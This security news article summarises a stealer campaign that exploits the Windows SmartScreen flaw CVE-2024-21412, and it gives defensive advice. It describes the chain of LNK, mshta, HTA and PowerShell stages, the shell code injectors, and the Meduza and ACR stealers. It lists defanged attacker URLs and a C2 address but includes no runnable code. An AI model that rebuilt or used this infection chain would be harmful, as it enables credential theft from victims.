A critical security bypass vulnerability, tracked as CVE-2024-21412, has been identified in Microsoft Windows SmartScreen.
This flaw arises from an error in handling maliciously crafted files, allowing remote attackers to bypass SmartScreen security warnings and deliver malicious payloads.
Over the past year, cybercriminals, including Water Hydra, Lumma Stealer, and Meduza Stealer, have exploited this vulnerability to conduct widespread attacks.
Exploitation Details
FortiGuard Labs has observed a stealer campaign leveraging CVE-2024-21412 to download malicious executable files. Attackers lure victims into clicking crafted links to URL files, which subsequently download LNK files. These LNK files then fetch executable files containing HTA scripts.
Once executed, these scripts decrypt PowerShell code to retrieve final URLs, decoy PDF files, and a malicious shell code injector. The injected stealer then initiates malicious activities and sends the stolen data to a Command and Control (C2) server.
Initial Access
The attack begins with a malicious link to a remote server, searching for a URL file with specific content.
The target LNK file employs the “forfiles” command to invoke PowerShell, then executes “mshta” to fetch an execution file from the remote server “hxxps://21centuryart.com.”
Join our free webinar to learn about combating slow DDoS attacks, a major threat today.
HTA Script Execution
Several LNK files were collected during the investigation, all downloading similar executables containing an HTA script embedded within the overlay.
This HTA script has set WINDOWSTATE=”minimize” and SHOWTASKBAR=”no,” playing a crucial role in the infection chain by executing additional malicious code.
After decoding and decrypting the script, PowerShell code downloads two files to the “%AppData%” folder: a decoy PDF and an execution file that injects shell code for the next stage.
Shell Code Injector
Two types of injectors were identified in this attack chain. The first variant leverages an image file to obtain shell code, with low detection rates on VirusTotal.
The injector downloads a JPG file from the Imghippo website, decodes the bytes to get the shell code, and calls the entry point of the shell code.
The shell code then obtains all the APIs from a CRC32 hash, creates a folder, and drops files in “%TEMP%,” identified as HijackLoader.
The second injector decrypts its code from the data section and uses a series of Windows API functions to perform shell code injection.
Final Stealers
This attack employs Meduza Stealer version 2.9, with its panel found at “hxxp://5[.]42[.]107[.]78/auth/login.”Meduza Stealer Panel
An ACR stealer loaded from HijackLoader was also identified. It hides its C2 on the Steam community website with a dead drop resolver (DDR) technique.
Other ACR Stealer’s C2 servers were found on Steam by searching for the string “t6t.” After retrieving the C2 hostname, the ACR stealer constructs a complete URL to fetch the encoded configuration from the remote server, which contains crucial information for the stealer.
Water Hydra, Lumma Stealer, and Meduza Stealer exploited CVE-2024-21412, which highlights the critical need for robust cybersecurity measures.
Users are advised to update their systems promptly and remain vigilant against suspicious links and files to mitigate the risk of such attacks. Businesses can teach their customers not to open files from unknown sources to lessen the impact of these kinds of attacks.
Protecting against advanced attack vectors requires a strong and proactive cybersecurity strategy since threat actors are always inventing new methods. Protecting a company’s digital assets requires proactive steps, user education, and strict security rules.
Protect Your Business Emails From Spoofing, Phishing & BEC with AI-Powered Security | Free Demo